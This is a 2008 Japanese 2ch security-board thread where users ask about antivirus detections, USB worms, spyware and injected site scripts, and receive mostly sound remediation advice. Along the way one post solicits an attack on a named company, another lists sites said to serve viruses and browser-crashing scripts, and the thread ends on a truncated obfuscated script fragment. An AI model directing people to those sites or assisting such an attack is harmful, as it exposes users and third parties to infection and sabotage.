08/11/13 06:11:29
移動します
すいませんでした
101:名無しさん@お腹いっぱい。
08/11/13 22:55:16
俺も今タククマネージャ見たらtaskmagr.exeがいた
確かにここ何日かにFlashget入れてたな
うーんこれさえなければ悪いソフトじゃないんだが
ノートン先生が無反応なとこ見るとウィルスではないんだろうか
でも名前がめっちゃウィルスっぽい
102:名無しさん@お腹いっぱい。
08/11/13 22:59:54
( ´_ゝ`)
103:名無しさん@お腹いっぱい。
08/11/13 23:12:56
というかノートンが糞なのか
ひょっとして
104:名無しさん@お腹いっぱい。
08/11/14 16:19:24
今頃気づいたのか?
105:名無しさん@お腹いっぱい。
08/11/16 02:53:31
ウィルスについての質問なんだけど。
Trojan.Generic.1007377ってどんなウィルスなんだ?
Bitdeffenderを使って調べたところ見つけたんだが、ググっても出てこない。
106:名無しさん@お腹いっぱい。
08/11/16 02:57:32
スペル間違えた
BitdeffenderでなくてBitdefenderだった
107:名無しさん@お腹いっぱい。
08/11/16 04:12:28
>>105
検出されたファイルをVirusTotalに上げて他社の検出名でググってみたら?
108:名無しさん@お腹いっぱい。
08/11/16 04:43:51
>>107
同意
Genericだから、ヒューリの可能性が高いし
109:名無しさん@お腹いっぱい。
08/11/16 05:52:45
まずVirus Totalで調べたところ、44.45%になった。
以下、検出結果。
AntiVir 7.9.0.31 TR/Crypt.XPACK.Gen
Avast 4.8.1281.0 Win32:Trojan-gen {Other}
AVG 8.0.0.199 SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001
他は検出していない。
これってウィルスなんだろうか?
110:名無しさん@お腹いっぱい。
08/11/16 06:01:23
半角スペース使ったため隙間が省略されてしまった。
かなり見づらくなってるから再度。
AntiVir 7.9.0.31 TR/Crypt.XPACK.Gen
Avast 4.8.1281.0 Win32:Trojan-gen {Other}
AVG 8.0.0.199 SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001
111:名無しさん@お腹いっぱい。
08/11/16 06:21:38
これだけ検出されると可能性は高いんじゃない?
ベンダにファイルを提出すれば検査結果を教えてくれるよ。
112:名無しさん@お腹いっぱい。
08/11/16 12:57:08
ありがとう。
ベンダに提出してみます。
113:名無しさん@お腹いっぱい。
08/11/16 17:42:43
CとDがクリックで開かなくなった…
スクリプトファイルが見つかりませんって…
114:名無しさん@お腹いっぱい。
08/11/18 09:43:22
AVGバージョン8で、generic10.caqというウィルスが検出されました。
対処はできたんですが、このウィルスがどんなものなのかググってもわかりません。
AVGの指示通り処理すれば大丈夫ですかね?
115:114
08/11/18 09:46:02
ググったら、「ca」はあったのですが「caq」はヒットしなかった、ということです。
116:名無しさん@お腹いっぱい。
08/11/18 09:51:50
名前なんてアンチウイルスによってバラバラなんだから
AVGスレで聞けば?
117:名無しさん@お腹いっぱい。
08/11/19 20:29:07
>>114
genericでぐぐれうんこ
118:名無しさん@お腹いっぱい。
08/11/20 04:44:03
アルボッキ性膜ってスレにあるアルバック成膜㈱の糞会社のPCにウィルス贈呈したいんだけど誰かやっちゃってくれません?
あんな会社目障りなので無くなってほしいんです
会社のPCとかに潜り込んで目茶苦茶にしたいんですが出来ませんかねぇ
119:名無しさん@お腹いっぱい。
08/11/20 08:23:58
>>118
その程度の頭じゃ無理
120:名無しさん@お腹いっぱい。
08/11/20 12:27:32
IPアドレスの認証や確立を妨げるウイルスってありますか?
常接なんですが、ヤケにDLに時間のかかるメールを受信した後、
PCを再起動したらIPアドレスの確立と認証ができなくなっていました。
ハード的にはLANを認識しているみたいです。
121:↑
08/11/20 12:29:20
ほぼ同時に3台やられたんで、泣き…です。
122:名無しさん@お腹いっぱい。
08/11/20 14:44:51
男性俳優板行くとカスペが反応するんだけどなにこれ。
URLリンク(u.cruze3.cn)
トロイの木馬っつーんだけどほんと?
123:名無しさん@お腹いっぱい。
08/11/20 14:57:27
直リンするんじゃねーよ。
FlashPlayerの脆弱性を使うトロイだな。
9.0.124未満ならあぼん。
124:名無しさん@お腹いっぱい。
08/11/20 14:58:40
ごめん。
>9.0.124未満ならあぼん。
そうなんだ。
つーか2chのあちこちの板にしかけられててこわひ。。
125:名無しさん@お腹いっぱい。
08/11/20 15:06:46
URLリンク(u.cruze3.cn)
URLリンク(u.cruze3.cn)
あとこれもついてきた。
2ch開くだけでなんでこんなウィルスついてくんの?
126:名無しさん@お腹いっぱい。
08/11/20 15:07:56
ググッても出てこないし。
こえー。
127:名無しさん@お腹いっぱい。
08/11/20 15:08:03
そのサイトの調査結果
URLリンク(www.aguse.jp)
検出されたマルウェアの詳細
URLリンク(www.f-secure.co.jp)
URL直に貼るな粕。
128:名無しさん@お腹いっぱい。
08/11/20 15:09:15
>>125
板開いてもそんなの無いぞ。
ブラウザのキャッシュ壊れてんじゃね?
129:名無しさん@お腹いっぱい。
08/11/20 15:21:18
>>128
www.proxylist.sakura.ne.jp
これ開いたらだった
ごめん
男性俳優板じゃなかった。スマソ
130:ナイトウォッチ
08/11/20 16:14:17
ガイシュツかも・・・
無料でウィルス検索できるサイト教えてください。
パソコンまだなれてなくて・・
メールを送ったらおかしくなったっていわれてウィルスかな?と思って
131:名無しさん@お腹いっぱい。
08/11/20 17:48:30
>>130
なんでアンチウイルスソフト入れないの?
馬鹿なの?
132:ナイトウォッチ
08/11/20 19:20:01
小さい会社のパソコンで入ってないみたいなんですよね;;
ノートンいれます。
133:名無しさん@お腹いっぱい。
08/11/20 22:04:58
>>132
ほらよ
スレリンク(sec板)l50
134:【来週強行・革命成立?】最凶の国籍法改正案
08/11/21 01:10:28
【来週強行・革命成立?】最凶の国籍法改正案 vs 最強のFAX凸撃 01/18
URLリンク(jp.youtube.com)
URLリンク(jp.youtube.com) 02/18
URLリンク(jp.youtube.com) 03/18
URLリンク(jp.youtube.com) 04/18
URLリンク(jp.youtube.com) 05/18
URLリンク(jp.youtube.com) 06/18
2時間目
URLリンク(jp.youtube.com) 07/18
URLリンク(jp.youtube.com) 08/18
URLリンク(jp.youtube.com) 09/18
URLリンク(jp.youtube.com) 10/18
URLリンク(jp.youtube.com) 11/18
URLリンク(jp.youtube.com) 12/18
3時間目
URLリンク(jp.youtube.com) 13/18
URLリンク(jp.youtube.com) 14/18
URLリンク(jp.youtube.com) 15/18
URLリンク(jp.youtube.com) 16/18
URLリンク(jp.youtube.com) 17/18
URLリンク(jp.youtube.com) 18/18
135:名無しさん@お腹いっぱい。
08/11/21 07:19:25
ツマンネ
136:名無しさん@お腹いっぱい。
08/11/21 08:44:56
>>134
つまんねー
137:名無しさん@お腹いっぱい。
08/11/22 22:53:38
【使用OS】 『XP pro 2002 sp3』
【使用ブラウザ】 『IE6』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウィルスセキュリティZero』
スパイウェア・ボット対策ソフト 『無』
【回線の種類・ルータの有無】 『ADSL マンション』
【具体的な症状】
突然しねしね団Flashが再生される。
DLした覚えはないです。
画面が閉じれない
【過程と措置】強制終了→起動→ウイルス検査
【その他】 海外赴任(インドネシア)の日本人です。
突然フラッシュが「死ね死ね 日本人」と始まり
身の危険も感じております。恨みを買われる覚えもあります。
どうかアドバイスお願い致します。
138: ◆N9P3SuvBPo
08/11/23 00:25:30
>137
セキュ質で回答が得られなかったとはいえ、マルチするのは良くありませんよ。
焦らずじっくり待ってみましょ。
139:名無しさん@お腹いっぱい。
08/11/23 13:24:30
URLリンク(koideai.com)
アドレスはPCの状態の画像です
検索したけどよくわかりません・・・
バスターで反応しなかったからウィルスじゃないのかな
このツールバーがサイトまわってたら知らないうちに入ってて
アンインストールしようとしても変なサイトに飛ばされそうになって
恐ろしくて途中で中断してしまいます
詳しいこと知ってる人これが一体何なのか教えてください・・・;
140:名無しさん@お腹いっぱい。
08/11/23 14:26:51
「Pirate Bay」っていうBit Torrentのファイル検索エンジンのツールバーみたい。
普通にアインストールしても大丈夫じゃない?
どっかにのサイトに飛ばされるのが嫌なら
FWの方でアンインストールする時だけIEのネットワーク接続を遮断すればいいし。
まぁ、これに懲りたらブラウザを変えることですな。
141:名無しさん@お腹いっぱい。
08/11/23 21:24:09
なぜかさっきの画像が出会い系に飛ぶようになっとる・・・
ウィルス関係ではないんですね
それが聞けただけでも安心できます!
とりあえず消してきます
142:名無しさん@お腹いっぱい。
08/11/26 00:21:52
PCを起動すると勝手に音楽が始まる…。
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?
143:名無しさん@お腹いっぱい。
08/11/26 00:54:25
俺のじゃないから問題なし
安心して寝な
144:名無しさん@お腹いっぱい。
08/11/27 00:12:42
>>142
勝手にieがコッソリ立ち上がる奴だろ?俺も同様な症状だ
極論だがieをアンインストールしてFirefoxらへんを使えば一応解決するとは思うが・・・
ウイルス対策ソフトの対応待ちか?
145:名無しさん@お腹いっぱい。
08/11/27 18:33:12
>>142
俺も同症状だ。
IEをアンインストールで解決するの?
146:名無しさん@お腹いっぱい。
08/11/27 20:15:56
とりあえずIEをリネームして様子見してはどうか
147: ◆N9P3SuvBPo
08/11/27 20:52:45
>142
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。
148:名無しさん@お腹いっぱい。
08/11/27 21:42:24
>>142
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
URLリンク(www.anvir.com)
149:名無しさん@お腹いっぱい。
08/11/27 22:46:58
【使用OS】 XP Home SP2
【セキュリティソフトと年式】 ウイルスバスター2009
【スパイウェア対策ソフト】 同上
【回線の種類・ルータの有無】 ADSL ルーター有
【具体的な症状】
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。
どうしたらよいのでしょうか?
感染したファイルは
C\WINDOWS\system32\msGDl1.dllです
よろしくお願いいたします。
150:名無しさん@お腹いっぱい。
08/11/28 01:57:39
>>142です!
みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。
ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。
151:名無しさん@お腹いっぱい。
08/11/28 12:45:25
スレイプニルでネット巡回中、突然「こんにちは!こんにちは!」というポップアップ表示がでてきました。
これは最近流行のウィルスだったりします?
152:名無しさん@お腹いっぱい。
08/11/28 12:46:23
ああ、やばいな
153:名無しさん@お腹いっぱい。
08/11/28 14:26:46
はまちちゃんだな
154:名無しさん@お腹いっぱい。
08/11/29 02:54:11
ルックルックこんにちはだな
155:名無しさん@お腹いっぱい。
08/11/29 10:39:11
USBをさしたらウイルスソフトの反応があってRECYCLERというフォルダとAutorun.infがありました
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?
156: ◆0fQkHdNop2
08/11/29 12:08:36
>>155
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)
尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。
また、USBワームの感染経路も調べる事を推奨します。
157: ◆0fQkHdNop2
08/11/29 12:28:57
>>155
今後の事を考えて自動再生をオフにされる事を推奨します。
URLリンク(windowshelp.microsoft.com)
158:名無しさん@お腹いっぱい。
08/11/29 17:32:02
>>156
ありがとうございます。
システムの復元をしたところ今度はwindowsがまともに起動しなくなりました。
とりあえず復元前に戻しましたが、もうリカバリしようかと思います。
159:名無しさん@お腹いっぱい。
08/11/29 18:44:02
その方が賢明だねw
160:名無しさん@お腹いっぱい。
08/12/04 17:13:06
ウィルスバスターがウィルスの定義ファイル更新したら
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね
161:名無しさん@お腹いっぱい。
08/12/04 17:24:04
リアルタイム検索にある
受信メール検索
送信メール検索
を切ったらOKになった
氏ね
162:名無しさん@お腹いっぱい。
08/12/04 22:26:57
>>142さん
その後の状況はどうですか。
同じ症状が出ました。
163:名無しさん@お腹いっぱい。
08/12/04 22:46:23
>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?
164:162
08/12/04 22:47:45
↑ミスったので修正…
>>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>>162さんはいれてないですか?
165:名無しさん@お腹いっぱい。
08/12/05 01:02:26
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
166:名無しさん@お腹いっぱい。
08/12/05 02:19:42
セキュリティ初心者質問スレッドpart114
スレリンク(sec板:784番)
784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
167:名無しさん@お腹いっぱい。
08/12/05 12:38:59
>>142です!
報告が遅くなりすみませんでした。
IEを削除し、再インストールしました。
その後、2日経っていますが音楽は鳴らなくなりました!
みなさんありがとうございました!
168:名無しさん@お腹いっぱい。
08/12/05 13:49:11
名前:(c) C:\WINDOWS\system32\dmserver.dll
脅威の名称: (D)W32/Patcher
状態:(E) 1025
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。
169:名無しさん@お腹いっぱい。
08/12/05 16:12:30
virustotalに投げてみれば?
170:名無しさん@お腹いっぱい。
08/12/05 17:23:21
>>162
それってサウンドがいじられてるだけじゃないの?
Windowsの開始時の音をそのWAVだかMP3だかにされてるとか
171:名無しさん@お腹いっぱい。
08/12/05 20:55:27
ampfrb.cmdって何ですか?
ドライブ全部にあるんですけど。
172:名無しさん@お腹いっぱい。
08/12/05 21:01:35
>>142さん
162です。
報告ありがとうございます。
IE8削除してIE7に戻してみました。
暫く様子をみてみます。
173:名無しさん@お腹いっぱい。
08/12/06 07:37:49
>>164さん
162です。
flashgetはかなり前から入れてますから関係無いと思います。
174:名無しさん@お腹いっぱい。
08/12/06 16:13:52
【使用OS】 「XP home sp2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?
175:名無しさん@お腹いっぱい。
08/12/06 17:06:13
ウイルスの命名はベンダーでばらばらなんだから
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。
176:名無しさん@お腹いっぱい。
08/12/06 18:46:58
>>174
隔離できてるなら問題ないのでは?
177:名無しさん@お腹いっぱい。
08/12/06 20:34:09
>>173
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。
178: ◆N9P3SuvBPo
08/12/06 22:03:27
>177
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。
179:名無しさん@お腹いっぱい。
08/12/07 00:03:33
中華製のスパイウェアソフトを入れるほうが悪い
いますぐアンインストールしろよ
中華製のソフトは使わないことだな
180:名無しさん@お腹いっぱい。
08/12/07 01:34:54
↑バスター使い
181:名無しさん@お腹いっぱい。
08/12/07 03:26:00
>>178
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。
182:名無しさん@お腹いっぱい。
08/12/07 03:30:54
ほい。
URLリンク(www.shareedge.com)
183:名無しさん@お腹いっぱい。
08/12/07 08:23:06
flashgetのバージョンが古くないか
184:名無しさん@お腹いっぱい。
08/12/07 12:29:25
>>182
自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…
>>183
VectorでダウンロードしたFlashGet1.9.6です。
185:名無しさん@お腹いっぱい。
08/12/07 18:21:11
A.状況
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
アクセスしたファイルは感染しています。
ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
オープン時に検出されました
処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
A0038268.exe 1件
A0038262.exe 3件
A0039185.exe 1件
b.その後、次のメッセージが表示された
D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0
186:185(続き)
08/12/07 18:22:29
(3)USBメモリーをコマンドプロンプトでattrib表示すると
SHR autorun.inf SHR f.exeが表示される。
(4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
[適用]→[OK]をした後、フォルダオプションを確認すると
「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
(5)マイコンピュータでハードディスクアイコンをダブルクリックすると
何で開くか聞いてくる。
(6)外付けのポータブルディスク3台も感染している模様。」
B.質問
1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
PSW.OnlineGames.2.Sというのは見つかりません。
2.対策は、どうすれば良いのでしょうか?
宜しくお願いします。
187:名無しさん@お腹いっぱい。
08/12/07 18:41:28
>>186
USBなんかを通して感染を広めるウイルスとネトゲのパスなんかを盗むものに感染してる
両方質が悪いしばっちし感染してるからすぐリカバリーしろ
188:名無しさん@お腹いっぱい。
08/12/07 18:59:59
>>185
URLリンク(mm113.blog49.fc2.com)
URLリンク(www.cyber-concierge.co.jp)
189:185
08/12/08 08:12:59
>>187,>>188
レスありがとうございます。
URLリンク(www.cyber-concierge.co.jp)
を、やってみます。
190:185
08/12/08 11:04:20
autorun.infを止める方法についての追加質問です。
次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?
(1)グループポリシーの設定を変える
[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
→[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]
(2)レジストリを変える
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
宜しくお願いします。
191:名無しさん@お腹いっぱい。
08/12/08 18:21:11
>>190
どちらもやってることは同じだと思うけど
(1)の方をお勧めしておく
192:名無しさん@お腹いっぱい。
08/12/08 19:26:53
俺はTweakUIで潰してるな
193:185
08/12/08 20:26:35
>>191
レスありがとうございます。
194:名無しさん@お腹いっぱい。
08/12/09 13:35:27
【使用OS】「vista」
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)
195:名無しさん@お腹いっぱい。
08/12/09 13:42:47
ありゃバスターなのでバスタースレでどうぞ。
196:194
08/12/09 13:45:52
ある日突然立ち上がった(購入後半年で初めて)
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」
専ブラ使ってるので>>8とは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです
197:名無しさん@お腹いっぱい。
08/12/09 14:36:30
ノートンお得意の2ch専ブラログの誤検知だろ
198:名無しさん@お腹いっぱい。
08/12/09 22:17:33
>>197
専ブラにも反応するんですか?
やっかいですね…
使ってないしノートン先生はアンインスコします
ありがとうございました
199:名無しさん@お腹いっぱい。
08/12/10 02:51:09
C:\WINDOWS\system32\sens.dll
W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?
200:名無しさん@お腹いっぱい。
08/12/10 07:57:26
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「最新」
先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
201:名無しさん@お腹いっぱい。
08/12/10 12:27:32
3.0mod3-3.54-setup.exe
a0030828.exe
バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?
誰か教えてくれ
202:名無しさん@お腹いっぱい。
08/12/10 13:07:15
>>199
sens.dllでググれ
203:名無しさん@お腹いっぱい。
08/12/10 13:46:11
>>201
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。
>>200
Renosでググれ。
>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
204:名無しさん@お腹いっぱい。
08/12/10 14:40:26
研究でウィルスの検体が大量に欲しいのですが、どこかにzipファイルなどでウイルスをゲットできるサイトありませんか?
205:名無しさん@お腹いっぱい。
08/12/10 17:39:18
>>204
それくらい自分で探そうね。
206:名無しさん@お腹いっぱい。
08/12/10 23:28:56
困っています。下記がバスターコーポレーションで検出
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
207: ◆N9P3SuvBPo
08/12/11 00:06:51
>206
案内レス
企業用PCでしょうか?
もしそうならシステム管理者にご報告を
208:名無しさん@お腹いっぱい。
08/12/11 07:06:04
ウイルスリムーバーをこらしめたいが
209:名無しさん@お腹いっぱい。
08/12/11 07:51:56
>167 さん
聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
210:名無しさん@お腹いっぱい。
08/12/12 19:45:24
>>203
THX
System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
211:名無しさん@お腹いっぱい。
08/12/13 01:05:56
いまエクスプローラで作業しているのだが
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
212:名無しさん@お腹いっぱい。
08/12/13 06:11:09
amvoをうつされたので下のサイトの通りに削除。
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。
スレリンク(sec板)l50
213:名無しさん@お腹いっぱい。
08/12/13 06:13:26
↑winXPSP3です。すまそ。
214:名無しさん@お腹いっぱい。
08/12/13 10:20:04
>>206
OSがファイルをつかんでしまっているためだと思います。
マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス
サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、
これでうちの会社はできましたよ。
一度やってみてください。
215:名無しさん@お腹いっぱい。
08/12/13 10:21:31
システムの復元については機能をとりあえずOFFにするといいと思います。
OSの復元はできませんが最悪再セットアップすればいい話なので。
216:名無しさん@お腹いっぱい。
08/12/13 21:34:35
自分のパソコンがどれだけ防御力が高いかためしたい。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。
自分の防御力を調べてみたいって人少ないのかなあ。
217:名無しさん@お腹いっぱい。
08/12/13 22:04:21
>>216
URLリンク(jp.youtube.com)
まだあるかわかんないけど。
リンクはようつべ
218:名無しさん@お腹いっぱい。
08/12/13 22:28:37
>>217 もっとちょうだい
gog いってみたけど今は配布してないようです。
219:名無しさん@お腹いっぱい。
08/12/13 22:57:54
【激しく既出、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
220:名無しさん@お腹いっぱい。
08/12/13 23:36:03
>>219 全部行ってみたんですが
みんなウイルスの挙動紹介の安全なHPですね。
221:名無しさん@お腹いっぱい。
08/12/14 01:19:47
スレチなら誘導お願いします。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
222:名無しさん@お腹いっぱい。
08/12/14 01:22:42
<script>function c102916999516m49435c6be9d24(m49435c6bea4f4)
